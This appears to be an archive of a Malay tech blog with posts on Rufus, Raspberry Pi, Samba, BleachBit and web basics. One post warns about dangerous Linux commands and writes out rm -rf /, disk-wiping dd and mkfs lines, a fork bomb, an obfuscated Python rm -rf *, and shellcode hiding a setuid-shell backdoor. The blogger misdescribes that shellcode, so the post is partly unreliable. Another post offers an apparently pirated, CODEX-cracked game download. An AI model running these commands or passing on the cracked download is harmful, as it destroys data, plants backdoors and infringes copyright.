Showing posts with label Info. Show all posts
Showing posts with label Info. Show all posts

Thursday, 7 November 2024

CARA-CARA KEMASKINI STR 2025 - KEMASKINI PERMOHONAN STR 2025 - Sumbangan Tunai Rahmah (STR) 2025

 CARA-CARA KEMASKINI PERMOHONAN STR 2025

1. Layari portal rasmi Sumbangan Tunai Rahmah (STR) 2025

https://bantuantunai.gov.my/

2. Laman Utama MySTR 2025 - Klik pada butang Log Masuk bagi membuat kemas kini permohonan.









    TERIMA KASIH

































Saturday, 21 September 2024

APA ITU RUFUS?

 

Rufus: Alat Pemacu USB Boleh Boot yang Berguna




Pengenalan
Rufus adalah sebuah aplikasi percuma yang sangat berguna untuk pengguna komputer, terutamanya bagi mereka yang sering bekerja dengan sistem operasi dan pemacu USB. Dengan Rufus, pengguna dapat membuat pemacu USB yang boleh boot dengan mudah, membolehkan mereka menjalankan pelbagai sistem operasi atau alat pemulihan.

Fungsi Utama

  1. Membuat Pemacu USB Bootable
    Rufus membolehkan pengguna memformat pemacu USB dan menyalin fail sistem operasi ke dalamnya, menjadikannya boleh digunakan untuk memasang Windows, Linux, atau sistem lain.

  2. Menyokong Pelbagai Format
    Rufus menyokong pelbagai jenis fail ISO, membolehkan pengguna menggunakan pelbagai sistem operasi dengan mudah.

  3. Antaramuka yang Mesra Pengguna
    Antaramuka Rufus adalah ringkas dan mudah digunakan, walaupun bagi pengguna baru. Pengguna hanya perlu memilih pemacu USB, memilih fail ISO, dan mengklik butang mula.

Kelebihan

  • Cepat dan Efisien: Rufus terkenal dengan kelajuan prosesnya, menjadikannya pilihan popular di kalangan pengguna.
  • Portabel: Rufus tidak memerlukan pemasangan; ia boleh dijalankan secara terus dari pemacu USB.


Muatturn Aplikasi RUFUS 

Sila Ke- Laman Rasmi Rufus Disini 



Kesimpulan
Rufus adalah alat yang sangat berguna untuk sesiapa sahaja yang perlu mencipta pemacu USB bootable. Sama ada untuk memasang sistem operasi baru, menguji distro Linux, atau menjalankan alat pemulihan, Rufus menjadikannya proses yang mudah dan cepat.



Tuesday, 19 April 2022

Apa Itu Rasberry Pi ?

     Pernahkah anda mendengar tentang Raspberry Pi? Adakah anda tahu apa itu Raspberry Pi? Bagi seseorang yang berada dalam bidang IT dan mempunyai pengetahuan mengenai teknologi, pasti tahu apakah itu Raspberry Pi.



Secara ringkasnya, ia boleh dikatakan sebagai sebuah komputer bersaiz mini dengan beberapa fungsi asas melaluinya.



Raspberry Pi hadir dalam saiz sebesar lebih kurang kad pengenalan kita, dimana beberapa komponen utama disertakan bersama-sama dengannya. Boleh dikatakan ia dibangunkan dalam memudahkan lebih ramai mempelajari pelbagai perkara berkaitan perkomputeran menggunakannya tanpa mengeluarkan kos yang tinggi.



Ia hadir dengan beberapa port terbina seperti HDMI (untuk dihubungkan ke monitor atau televisyen), port USB (untuk tetikus dan papan kekunci), dan juga port mikro-SD (untuk ruangan sistem dan fail). Ia hadir dalam dua variasi, iaitu set A dan juga Set B. Membezakannya, Set B untuk Raspberry Pi turut hadir dengan sokongan port Ethernet yang membolehkan pengguna menghubungkan talian internet melaluinya. Untuk sokongan kuasa, ia menggunakan kabel mikro-USB yang sedia digunakan pada pelbagai peranti mudah-alih hari ini.




Sistem Operasi


Raspberry Pi menyokong beberapa sistem operasi yang dioptimasikan untuknya. Salah satu yang popular adalah Raspbian yang mana merupakan versi Debian untuk Raspberry Pi.

Pihak Raspberry sendiri menyediakan sebuah halaman muat-turun khas untuk beberapa koleksi sistem operasi mereka. Pengguna juga boleh memuat-turun NOOBS yang menyediakan pemasangan mudah untuk pengguna umum.

Namun, saiz fail NOOBS boleh dikatakan agak besar, dan sekiranya pengguna mempunyai sambungan internet yang tidak begitu laju, mungkin boleh memuat-turun sesuatu sistem operasi yang diminati mereka, ataupun Raspbian sekiranya baru ingin mula menggunakan Raspberry Pi.

Laman Web Rasmi Rasberry PI.

Raspberry Pi menyokong beberapa sistem operasi yang dioptimasikan untuknya. Salah satu yang popular adalah Raspbian yang mana merupakan versi Debian untuk Raspberry Pi. Raspberry Pi juga dapat menyokong sistem lain seperti Windows, Ubuntu Core dan sebagainya.

Antara fungsi Raspberry Pi adalah:


Sebagai Komputer Desktop Mini

Perkembangan dalam penggunaan Raspberry Pi semakin canggih. Raspberry yang dilengkapi dengan RAM dan CPU, beberapa port USB yang mempunyai fungsi seperti komputer desktop tanpa mengeluarkan kos yang tinggi. Dengan menggunakan Raspberry Pi juga, kita dapat melayari internet, menonton video, memproses data dan bermain komputer game.


Sebagai File Server

Raspberry Pi berfungsi juga sebagai file server dengan tetapan yang tepat. Berdasarkan Samba (File server), kita dapat menggunakan External Harddisk yang boleh dihubungkan ke Raspberry Pi melalui port USB sebagai media media penyimpan data. Kita juga boleh menggunakan sebagai file sharing kepada orang lain.


Sebagai Acces Point

Dengan memasang sebuah adapter Wi-Fi yang sesuai dengan Raspbian, kita dapat mengubah Raspberry Pi menjadi sebuah access point dengan menambahkan aplikasi seperti Hostapd dan DHCP server. Hostapd adalah aplikasi server untuk mengurus adapter Wi-Fi yang berfungsi sebagai access point disamping melakukan proses validation terhadap permintaan sambungan(connection) klien yang akan terhubung dengannya. Manakala, DHCP Server berfungsi untuk menyediakan IP address yang digunakan oleh klien selepas proses validation. Access point Raspberry Pi akan valid sebagai pusat access point buatan sekiranya dikonfigurasikan dengan betul.


Web Server yang menarik.

Boleh melancarkan web server melalui Raspberry Pi board. Contoh web server yang boleh mempelajari pelbagai bahasa programming seperti CSS, PHP, HTML dan sebagainya. Selain itu, kita dapat melancarkan website sendiri atau blog kerana ia dapat mengendali WordPress


Sebagai Sistem Penggera dan Keselamatan Rumah

Raspberry Pi dapat menempatkan(host) sistem penggera dan keselamatan rumah yang sederhana namun mengagumkan. Dengan bantuan sensor dan kamera, kita dapat memantau dan mengawal rumah semasa dalam perjalan atau bekerja.


Terdapat pelbagai fungsi Raspberry Pi yang kita boleh gunakan dengan fungsi penggunaannya yang semakin canggih. Selain itu, kita dapat belajar sesuatu yang baru mengenai teknologi ini. Ia bukan hanya berfungsi sebagai komputer mini, malahan dia juga boleh digunakan bersama dengan peranti yang lain dan mudah didapati di kedai-kedai online dengan tanpa menggunakan kos yang tinggi.

Sumber : amanz.my, raspberrypi.org , mycompass.io


Tuesday, 23 August 2016

Muatturun Naruto Shippuden Ultimate Ninja Storm 4

                      Naruto Shippuden Ultimate Ninja Storm 4




Sesiapa yang tengah cari Naruto Shippuden Ultimate Ninja Storm 4 bolehlah download dekat sini.Den share benda ni sebab den minat NARUTO dari kocik.Apo lagi jom Download.Fail satu-satu jadi korang kena download satu-satu yer, pastikan download winrar kalau tak ada download dekat sini  dan Daemon  Tool dekat sini 

Minimum System Requirements:

OS: Windows 7 (64-bit), 8 (64-bit), 8.1 (64-bit), 10 (64-bit)
Processor: Intel i3-530 2.93 GHz / AMD Phenom II X4 940 3.0GHz atau lebih tinggi
Memory: 4 GB RAM atau lebih tinggi
Storage: 40 GB tersedia
Graphics: 2048 MB video card & Pixel Shader 5.0 atau lebih tinggi
DirectX: Versi 11 atau lebih tinggi


Cara Install:

  1. Download Naruto Shippuden Ultimate Ninja Storm 4 melalui link di atas
  2. Taruh semua part ke dalam satu folder, lalu ekstrak part 1
  3. Mount file iso Naruto Shippuden dengan Daemon Tools
  4. Jalankan setup.exe, lalu semak Copy contents of CODEX
  5. Klik install, lalu tunggu sehingga pemasangan selesai
  6. Apabila sudah selesai, jalankan games tersebut melalui Desktop
  7. Selamat bermain!



Muatturun Fail :

Fail 1

 Fail 2

Fail 3 

Fail 4

Fail 5

Fail 6

Fail 7

Fail 8



kredit to bagas31

Thursday, 11 December 2014

Apa Itu Stock ROM, Custom ROM & Firmware?

Sejak akhir-akhir ni, ramai yang tanya aku pasal firmware, stock ROM, custom ROM, OS, dan pelbagai lagi. Dan semestinya kesemua itu berkaitan dengan telefon. Aku sendiri pun sebenarnya tidak beberapa faham dengan istilah-istilah tersebut.

Tapi, untuk merungkaikan persoalan yang ada didalam hati ni, aku cuba menyelidik apakah ia sebenarnya. Jadi bagi pemahaman korang semua, aku akan membahagiankannya kepada beberapa bahagian.Mungkin entri agak panjang berjela-jela. Tak nak baca semua pun takpe. Aku sendiri pun masih belajar pasal semua nie. Mungkin ada kesilapan sedikit dalam penerangan. Aku harap korang dapat betulkan jika ada kesilapan tersebut. Jadi, dibawah aku akan menerangkan sedikit mengenai Android, Windows Phone 7 dan iOS (Apple). Untuk Symbian, aku masih lagi cuba memahami mengenainya. Tiada maklumat yang aku dapat masukkan kedalam entri ni.


Definisi OS

Apa-apa pun kita kena tahu apakah definisinya terlebih dahulu. Semua komputer yang menggunakan Windows, Mac OS X, dan Linux beroperasi memerlukan perisian sistem tertentu yang dikenali sebagai sistem pengoperasian (OS). Manakala telefon pintar sekarang juga memerlukannya, tetapi ia didatangkan didalam versi mobile (Mobile OS). Sebagai contoh Mobile OS adalah Android, Windows Phone 7, Apple iOS, BlackBerry OS, dan Symbian^3. Kesemua itu adalah antara mobile OS yang digunakan dikebanyakkan telefon pintar sekarang. Untuk mengetahui lebih lanjut, korang boleh pergi ke entri yang aku pernah tulis melalui pautan dibawah.



Apakah ROM

ROM adalah singkatan daripada Read-Only Memory. Ia boleh dikelaskan sebagai memory dalaman sesebuah peranti tersebut. Rom ini mempunyai arahan dari sistem yang tidak perlu di ubahsuai dan ianya disimpan didalam ROM (Read-Only Memory) atau secara mudahnya seperti CD-R atau DVD-R. Segala pengubahsuaian mungkin akan membuat arahan tersebut tidak berfungsi atau merosakkan telefon tersebut. Jadi ianya bebeza dengan hard disk dan USB drive yang mempunyai akses read/write walaupun ianya mempunyai fail sistem.

Apakah Firmware

ROM yang dinyatakan seperti diatas juga boleh didefinisikan sebagai Firmware. Yang membezakannya adalah ia boleh diubahsuai. Selalunya, bila ia sudah diubahsuai, ia pasti memerlukan peranti lain sebagai Read-Only tetapi ia melalui perlindungan/pengawasan tertentu.

Flashing

Memori untuk ROM yang sering digunakan pada telefon pintar sama dengan flash memory seperti SD Memory Card dan USB drive. Ianya dioptimumkan untuk tahap kelajuan dan prestasi yang lebih baik untuk Mobile OS tersebut. Jadi korang dibenarkan melakukan pengubahsuaian pada file sistem tersebut dan memerlukan prosedur khas keatasnya. Jadi proses pengubahan atau penggantian file dari memori flash tersebut dikenali sebagai Flashing. Atau kata lain, Flashing adalah proses pengubahsuaian firmware.

Mobile OS

Sebelum aku bercerita panjang mengenai mobile OS nie, aku rasa apa salahnya jika menghuraikan sedikit mengenainya.

Definisi

Seperti yang aku katakan diatas, ROM boleh didefinisikan sebagai firmware. ROM ini juga boleh dianggap sebagai OS kerana apabila ia dirujuk kepada telefon pintar dan tablet, dan juga ROM itu sendiri merujuk pada firmware yang dipasang di dalam memori peranti tersebut. Jika korang disuruh untuk memuat turun sesuatu ROM, apa yang mereka katakan adalah satu firmware yang mengandungi format fail yang sudah sedia untuk dipasang ke peranti korang bagi menggantikan firmware yang lama.

Jenis ROM

Tidak seperti kebanyakkan desktop OS, mobile OS boleh didapati dalam format sedia dipasang dalam pelbagai bentuk antaranya seperti dibawah.

Truly Stock ROM/Firmware

Versi ini boleh dikatakan didalam bentuk asal (default). Tiada pengubahsuaian yang dibuat melainkan memberi sokongan kepada satu peranti tertentu untuk dijalankan. Ia menawarkan penggunaan standard dari sistemnya tanpa sebarang perubahan pada paparan antaramuka mahupun fungsi. ROM/Firmware seperti ini selalunya boleh didapati pada peranti dan sistem pengoperasian yang dibina oleh syarikat yang sama. Sebagai contoh Apple iOS, Palm WebOS, BlackBerry OS dan sesetengah peranti Android yang ROM/firmwarenya tidak diubahsuai oleh pengeluar.

Manufacturer(Pengilang) atau Carrier (Pembekal) Stock ROM/Firmware

Versi ini pula memiliki penambahan jika dibanding dengan sistem operasi asal (default) yang dikeluarkan oleh pengilang. Selalunya ia merangkumi penaiktaraf dan penambahan pada paparan antara muka, aplikasi, dan sekatan yang bertujuan untuk mencegah peranti diguna di kawasan tertentu. Begitu juga sekatan untuk mencegah dari pemasangan ROM/firmware yang tidak dikeluarkan oleh pembekal atau pengilang.

Kebanyakkan peranti yang menggunakan Android dan Symbian termasuk didalam kategori ini. Begitu juga sebahagian besar peranti Windows Phone 7 dimana menggunakan Truly Stock ROM/firmware yang diubahsuai. Tetapi perubahan ini amat sedikit dan hanya memasukkan aplikasi tambahan sahaja.

Custom ROM/Firmware

Hampir kesemua peranti yang dibuat dihantar menggunakan ROM/Firmware diatas dan ia tidak berakhir disana. Independent Developer adalah seorang yang suka mengubahsuai peranti mereka melebihi pilihan yang ditawarkan oleh pembekal/pengeluar dan berkongsi hasil kerja mereka kepada orang ramai. Dan hasil pengubahsuaian mereka itu dipanggul Custom ROM. Selalunya mereka memilih Android OS untuk dijadikan Custom ROM kerana ia didatangkan didalam kategori sumber terbuka (Open Source).

Bagi Apple iOS dan Windows Phone 7, untuk menjumpai Custom ROM/Firmware amatlah sukar. Tetapi selalunya bagi kedua-duanya selalu didatangkan dalam bentuk pukal bersama alat/aplikasi yang menawarkan fungsi diluar ciri-ciri firmware. Untuk mengetahui maklumat lebih lanjut mengenai Custom ROM, korang boleh mendapatkan maklumat dan juga Custom ROM itu sendiri di forum XDA-Developers atau diforum lain.

cc to :Piratz

Tuesday, 22 April 2014

Website vs Portal

Asslammualaikum & Selamat Sejatera


Apakah perbezaan antara portal dan website(laman web) ? Contohnya portal pendidikan utusan. Tidak bolehkah jika menyebutnya sebagai laman web pendidikan utusan? Berdasarkan bacaan saya di forum-forum mendapati ada pencanggahan pendapat tentang maksud dan perbezaan antara keduanya. Pendapat mengatakan portal dan laman web adalah entiti yang berbeza namun saling melengkapi. Keduanya juga berkait....


tetapi tidak boleh menggantikan antara satu sama lain. Laman web (Website) memberikan sebuah organisasi/pertubuhan kepada dunia luar, sementara portal menyediakan beberapa peranan pengguna bagi mengakses sumber yang luas. Terdapat 3 perbezaan yang dikatakan menunjukkan perbezaan antara portal dan laman web

i. Pengesahan:
Laman web: Menyediakan kemudahan Logging-In. Meminta maklumat tentang siapa
anda.Cont; mail.yahoo.com, gmail.com
Portal: Tidak ada kemudahan log-in.Cont:www.yahoo.com . Maka jika ada sekolah
mempunyai portalnya sendiri tetapi ada kemudahan logging in..maka ia bukan
portal sekolah tetapi laman web sekolah.

ii.Peribadi:
Laman web: Terhad, berfokus kandungan. Menghilangkan keperluan untuk melawat
pelbagai laman. Cont: memasuki email dan bergerak di dalamnya sahaja.
Portal: ekstensif, kandungan tidak berfokus sepenuhnya yentang apa yang ditulis
dan melihat kepada keperluan pengguna.

iii.Kesesuaian
Laman web : Memilih dan mencapai apa yang telah disediakan sahaja.
Portal: Memberikan pautan yang boleh dicapai oleh pengguna. Pengguna perlu
mencarinya sendiri. Semua kandungan yang ada untuk setiap pengunjung.

Terdapat pelbagai lagi pendapat tentang perbezaan antara keduanya. Tetapi bagi pengguna biasa seperti kita, samada ia portal atau laman web tidak memberi perbezaan kepada kita asal apa yang kita mahu/ cari mencapai objektifnya.

sumber: Link 1
            Link 2 

Cipta Kod Bar QR Anda Sendiri


Assalammualaikum & Selamat Sejahtera


Pada masa kini dimana-mana sahaja kita akan nampak Kod QR (Quick Response) ini. Kod bar segiempat ini  berperanan dalam mendapatkan koordinat lokasi, URL, sebarang mesej teks atau maklumat kenalan ke telefon dengan cepat. Dengan aplikasi pengimbas barcode yang dipasang pada telefon atau netpad, kita hanya perlu menunjukkan kamera telefon pada kod untuk membaca kandungannya. Kod gambar diatas ini merupakan Kod QR Code saya.

 Anda boleh mendapat / mencipta QR KOD anda di SINI

Sekian Terima Kasih

Sumber :RMM ICT

Saturday, 19 April 2014

Google Andoid TV



Google merancang untuk melancarkan satu lagi smartTV, hanya beberapa hari selepas Amazon melancarkan TV neraka. Dengan antara muka menghiburkan, tidak melihat sebagai platform pengkomputeran, ia akan termasuk "kad" bagi setiap filem, menunjukkan, aplikasi dan permainan - semua duduk di atas rak maya - dan pengguna akan dapat mengakses kawalan jauh untuk menavigasi melalui kandungan .

Google mendakwa tha smartTV ini akan menjadi lebih mudah untuk digunakan.Sebagai TV Adroid berasaskan, anda akan Albe untuk memuat turun aplikasi anda sendiri.
Salah satu keunikan akan menjadi sistem kandungan mencadangkan (suggesting content system) , diaktifkan sebaik sahaja peranti akan menjadi aktif.
Google kini menyewa pemaju baru untuk membina aplikasi baru untuk Android dan TV masih tiada tarikh pelancaran.

Persamaan Antara Perkakasan/Perisian Komputer & Tubuh Manusia




Jika komputer disamakan dengan tubuh manusia, bahagian mana yang fungsinya boleh dikatakan sama. Adakah sama atau hampir sama atau tidak sama langsung. Satu yang pasti, komputer tiada emosi seperti kita. Mari kita lihat pelbagai pendapat mengenainya.

1. CPU - Otak kerana memproses pelbagai maklumat
2. Monitor - Mulut kerana memberikan output daripada apa yang otak fikirkan.
3. Mouse - Tangan kerana bergerak atas arahan daripada otak

4. Antivirus - Hati kerana antara fungsinya menyahtoksik bahan beracun sama seperti virus
5. Recyce Bin - Hati juga kerana fungsi lainnya sebagai sistem pencernaan. RecycleBin kan tempat buangan !!
6. Kipas - Paru-Paru kerana berfungsi memberi udara kepada tubuh badan.
7. Microphone - Telinga kerana menerima suara dan menghantar ke otak untuk diproses
8. Scanner - Mata kerana melihat dokumen dan hantar ke otak.
9. Printer - Mulut kerana mengeluarkan benda atau kata-kata
10.Wire - Salur darah
11.RAM - Satu ruangan dalam otak yang menyimpan ingatan sementara
12.Hard Disk - Apa yee...

Ada lagi ke... Kongsi-kongsi la di sini...

Friday, 18 April 2014

Ubuntu 14.04 LTS (Trusty Tahr) Dilepaskan




Secara rasminya Canonical melepaskan keluaran versi terkini iaitu  Ubuntu 14.04 LTS dengan nama Trusty Tahr. Dengan penambahbaikkan persekitaran desktop lalai Unity, grafik yang dipaparkan juga lebih menarik. Beberapa perkara kecil yang sebelum ini tiada seperti konfigurasi ‘launcer icon’ telah tersedia tanpa perlu memasang Compiz Config.

Walaupun tidak banyak perubahan ketara pada versi baru ini, agak berbaloi dengan kemaskinian untuk mendapatkan versi kernel yang lebih tinggi serta lain-lain aplikasi lalai terkini. Apa yang agak menghampakan ialah dengan tiadanya Ubuntu One pada versi ini kerana pengumuman baru-baru ini mengenai penutupan servis Ubuntu One.



Untuk memuat turun Ubuntu 14.04 LTS, anda perlu melayari laman web rasmi Ubuntu

Sekian Terima Kasih
Encik Ubuntu (Linux User )

Chrome Remote Desktop Untuk Android, Versi Untuk IOS Akan Keluar Pada Akhir Tahun Ini




Syarikat yang terkenal iaitu GOOGLE telah melancarkan Chrome Remote Desktop.
Chrome Remote Desktop kini boleh didapati di kedai Gedung Main (Play Store), membolehkan sesiapa yang mempunyai peranti Android untuk menyambung dan mengawal desktop mereka (Windows atau Mac) melalui aplikasi Chrome Web ( Chrome Web app ) dalam penyemak imbas(Chrome browser). Mereka mengatakan bahawa versi untuk IOS akan datang "pada akhir tahun ini", dan akses kepada Chromebook masih dalam kerja-kerja pembinaan.

Versi desktop Chrome Desktop Jauh (Chrome Remote Desktop) telah keluar sejak 2011 , tetapi ini adalah kali pertama ia telah datang ke telefon mudah alih. Ia memasuki pasaran yang sesak seperti Microsoft mempunyai aplikasi Desktop Jauh (Remote Desktop applications) untuk Android dan IOS pada Oktober lepas . Namun, ramai pengguna mempercayai nama jenama di sebalik Google Chrome dan bersedia untuk mengambil aplikasi ini. Ia memberikan anda akses penuh ke desktop anda, membolehkan anda untuk mengawal desktop  seolah-olah anda sedang duduk betul-betul di hadapannya.




Jika anda ingin mencuba anda  boleh memuat turun Chrome Desktop Jauh untuk Android (Chrome Remote Desktop) dari Google Play Store.

Apa yang anda fikir Android app baru ini? Berguna, atau sebaliknya?


Encik Ubuntu (Linux User )

Sumber

Thursday, 17 April 2014

BERSIHKAN SISTEM LINUX ANDA DENGAN BLEACHBIT



Assalammualaikum & Selamat Sejahtera

Sebelum Baca jom tengok  ni klik

BleachBit adalah sebuah aplikasi yang biasaa digunakan untuk membersihkan fail-fail "sampah" yang sudah tidak diperlukan pada sistem operasi linux. BleachBit bekerja dengan cara memadam cache, cookies dan history pada web pelayar, memadam temporary file serta didakwa mampu memadam log dari 70 aplikasi seperti Mozilla Firefox, Filezilla, Flash, Google Chrome, gedit, Pidgin, Adobe Reader, APT dan sebagainya.Kira bleachbit ini macam Ccleaner.



Selain itu, BleachBit juga boleh digunakan untuk:

  • Mengosongkan memori dan swap.
  • Memadam shortcuts yang rosak.
  • Memadam history URL pada pelayar Firefox versi 3 tanpa menghapuskan seluruh fail.
  • Memadam Linux localizations iaitu mengeluarkan bahasa yang tidak digunakan.
  • Membersihkan APT untuk keluarga Linux Debian, Ubuntu, Kubuntu, Xubuntu, dan Linux Mint.
  • Menjalankan yum clean untuk keluarga Linux CentOS, Fedora, dan Red Hat untuk menghapuskan cached package data.
  • Memadam recent dokumen pada OpenOffice.org tanpa menghapuskan seluruh file Common.xcu.
  • Melakukan wiping pada free space harddisk anda, untuk menyembunyikan jejak file yang sudah dihapuskan.
  • Meningkatkan kelajuan web pelayar seperti Firefox dan Google Chrome.
  • Aplikasi BleachBit tersedia untuk sistem operasi CentOS, Debian, Fedora, Mandriva, openSUSE, Red Hat, Ubuntu juga Windows.


Cara-Cara pemasangan:

  Debian / Ubuntu

  • sudo apt-get install bleachbit

          Red Hat (CentOS dan Fedora)


  • sudo yum install bleachbit

OpenSUSE

  • sudo zypper install bleachbit

Website Rasmi: KLIK


# Sekian Terima Kasih
# Encik Ubuntu (LINUX USER)

Tuesday, 15 April 2014

Apa itu Samba?

Apa itu Samba ? 

Samba adalah Perisian Percuma yang dilesenkan di bawah GNU General Public License, projek Samba adalah ahli Software Freedom Conservancy. Pengertian Samba Samba adalah server yang sangat powerful yang dapat membuat sistem berbasis Unix (seperti Linux) untuk melakukan sharing resource dengan system berbasis Windows. Hal ini tentu sangat berguna pada sebuah LAN yang terdiri atas beberapa workstation dengan flatform sistem operasi Linux dan Windows sehingga dapat lebih efisien dengan adanya pembagian resource, seperti file dan printer, untuk dapat digunakan secara bersama-sama. Samba merupakan sebuah software aplikasi buatan Andrew Tridgel dari ANU (Australian National University) dengan mengimplementasikan protokol SMB (Server Message Block) pada sistem operasi Unix. Protokol ini kadang-kadang dapat berlaku sebagai protokol CIFS (Common Internet File Sistem), LanManager, NetBIOS. Protokol SMB ini dapat membuat sebuah komputer dengan sistem operasi Unix menjadi file atau print server menjadi file atau print server atau seperti klien ftp untuk mengakses share SMB baik di Samba server atau di sever lain yang kompatibel seperti Windows NT, mendukung nameserving dan browsing NetBIOS, dan lain-lain.

Mekanisme SMB

Username dan Password 

Untuk memahami hubungan antara Linux/Samba/Windows, kita harus mempelajari sistem file, printer, dan user pada kedua operating sistem. Beberapa manajemen pengaturan username dan password :


  •  Linux Password Authentication Module (PAM), akan membuat autentikasi user dengan PDC sehingga kita tetap mempunyai dua user, satu di lokal dan satu lagi di PDC , tapi user hanya perlu menyimpan password hanya dalam sistem window.
  • Samba sebagai PDC, akan menyimpan login dan password pada sistem Linux.
  • Membuat penyelesaian sendiri dengan Perl, kita boleh membuat sendiri. Hal ini dilakukan dengan menggunakan Winperl dan modul-modul Perl yang membolehkan pengubahan paa Security Access Manager (SAM), untuk mengupdate senarai password PDC. Skrip Perl pada sisi Linux boleh berkomunikasi dengan skrip WinPerl untuk menjaga penyelarasan account.

Perbezaan smbd dengan nmbd 

Sebenarnya Samba disusun atas dua damon , yatu smbd dan nmbd . Smbd adalah daemon yang secara nyata menangani servis sharing file sistem dan pencetak untuk pelanggan . Pada saat sebuah pelanggan melakukan pengesahan , smbd akan membuatkan salinan dirinya , bahagian asal akan kembali ke port 139 untuk mendengar permintaan baru dan bahagian salinan menangani sambungan terhadap pelanggan . Dulikat ini juga menukar ID user efektifnya dari akar ke user yang terautentikasi . Misalnya , kalau user " user " melakukan pengesahan dengan smbd , salinan baru akan berjalan dengan permisi " user " , dan bukannya meminta izin " root " ) . Salinan ini akan berada di memory selama masih bersambung dengan pelanggan . Daemon nmbd bertanggung - jawab untuk menangani permintaan server name NetBIOS . Ia akan mendengar port 137 , tidak seperti smbd , nmbd tidak membuat contoh dirinya untuk menangani setiap soalan . Kedua daemon itu harus dijalankan agar Samba bekerja dengan baik . 


 Fungsi SAMBA 

  •  Menghubungkan antara mesin Linux ( UNIX ) dengan mesin Windows . Sebagai perisian cukup banyak fungsi yang boleh dilakukan oleh samba software , mulai dari merapatkan sharing file , sharing device , PDC , firewall , DNS , DHCP , FTP , webserver , sebagai gateway , mail server , proksi dan lain - lain
  • Kemudahan pengremote seperti telnet dan ssh juga tersedia . Salah satu kelebihan lain adalah adanya aplikasi tetapan yang tidak lagi hanya berasaskan teks , tetapi juga berasaskan grafik iaitu swat . Meletakkan masin Linux / UNIX sebagai PDC ( Primary Domain Controller ) seperti yang dilakukan oleh NT dalam rangkaian wondows . 
  •  Samba PDC ( Primary Domain Controller ) bertujuan sebagai komputer yang akan melakukan pengesahan user kepada setiap client yang akan bergabung dalam satu domain tertentu , dengan kata lain hanya user yang berdaftar yang dibenarkan masuk ke domain tersebut dan mengakses semua kemudahan domain yang disediakan . 
  • Boleh berfungsi sebagai domain controller pada rangkaian Microsoft Windows . 


Kelebihan Samba 

  • Percuma atau free
  • Terdapat untuk pelbagai macam platform 
  • Mudah ditetapkan oleh pentadbir
  •  Sudah berhubung langsung dengan rangkaian dan jarang ditemui masalah dalam  penggunaannya di rangkaian 
  •  Mudah ditetapkan sesuai dengan keperluan pentadbir 
  •  Dapat dipercayai kerana jarang berlaku kesalahan, kecuali sever computer anda bermasalah  dengan peranti kerasnya. 
  •  Mempunyai prestasi yang maksimum.

Sekian Terima Kasih 
Atikel ini telah diterjemahkan oleh Encik Ubuntu  ( B.Inggeris ke B.Melayu  )

Sunday, 13 April 2014

7 PERINTAH-PERINTAH BERBAHAYA DI LINUX




Assalamualaikum.. & Salam Sejahatera  

                             
Terdapat banyak artikel yang membahas “7 perintah berbahaya di linux”, sebenarnya ada lebih dari 7. Dan yang berbahaya sebenarnya bukanlah perintahnya melainkan kelalaian user ketika menggunakan akses sebagai root, jadi sesungguhnya anda terbebas dari bahaya ini jika ketika anda menjadi root, anda berhati-hati.
Berikut adalah yang Encikdapat dari ubuntuguide, gunakan sebagai pelajaran dan bukan untuk kejahatan.

1. Mengahapus semua yang ada di derektori

rm -rf /
rm -rf .
rm -rf *



rm -rf / mungkin tidak akan berhasil jika anda tidak memiliki akses root seperti memakai sudo, namun rm -rf . dan rm -rf * dapat menghapus apa saja di direktori dengan akses user biasa, jadi hati-hati.

2. Reformat data di device


mkfs.ext3 /dev/sda2
mkfs.apasaja /dev/sda3


Kemungkinan tak akan berhasil tanpa akses root, dan kalau pun berhasil data masih bisa dikembalikan

3. Manipulasi block device


perintah_apa_saja > /dev/sda
dd if=apalah of=/dev/sda


Mengerikan, Encikbelum pernah cuba ini tapi terlihat jika anda mencuba salah satunya maka block awal device (atau harddisk) akan menjadi raw atau format yang tidak dketahui.

4. ForkBomb


:(){:|:&};:        di bash
fork while fork         di perl


Encik tidak paham  ini tapi ubuntuguide mengatakan perintah-perintah itu akan menyebabkan sistem menjadi hang.

5. Tarbomb

Menarik dunia linux, ternyata file tar archive oleh seseorang dapat digunakan untuk menginjeksi file-file ke dalam sistem atau dengan cara lain dapat menduplikat jutaan file. Pencegahannya, jika anda diminta untuk mengekstrak tar di derektori tertentu maka anda harus berhati-hati, ekstrak di direktori yang bersih, setelah yakin aman baru pindahkan pada direktori yang diminta.

6. Bom Decompression

File archive yang terlihat kecil namun saat didekompresi menjadi berukuran GB

7. Mengeksekusi script yang tidak jelas sumbernya

Banyak yang beranggapan Linux itu tahan atau anti virus, ini keliru karena tidak ada OS yang tahan virus dan bug. Linux jarang terkena virus karena penggunanya selalu mengeksekusi script dari sumber yang diketahui seperti dari repository distronya atau dari situs dipercaya seperti launchpad, sourforge misalnya. Contoh berikut adalah script python

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

dimana “sn!.sg!+” serupa dengan perintah rm -rf *. Jika dilihat script itu, bahkan yang mahir dengan python pun belum tentu menyadari bahayanya.

Contoh lain (Encik belum pernah cuba yang ini dan belum tahu cara menggunakannya):


char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
               = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                 "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                 "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                 "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                 "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                 "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                 "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                 "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

ubuntuguide mengatakan ini sama dengan rm -rf ~ / &.


#Sekian Terima Kasih
#Encik Ubuntu (Linux User)

Saturday, 15 March 2014

Apa itu Nama Domain & Web Hosting?

Kalau kita ingin membina dan memiliki sebuah laman web. Kita tidak akan lari dari 3 kompenen asas iaitu: Website, Domain dan Webhosting.

1. Website (Rumah)
Kita boleh menganggap website itu adalah seperti rumah kita. Untuk membina rumah, kita perlukan, simen, batu-bata, papan, paku, syiling dan sebagainya.
Samalah halnya dengan membina website, untuk membina website, kita memerlukan perisian pembangunan web seperti Dreamweaver, Frontpage dan lain-lain. Website kita pula boleh berbentuk html, php,asp dan sebagainya.

2. Nama Domain (Alamat Rumah)
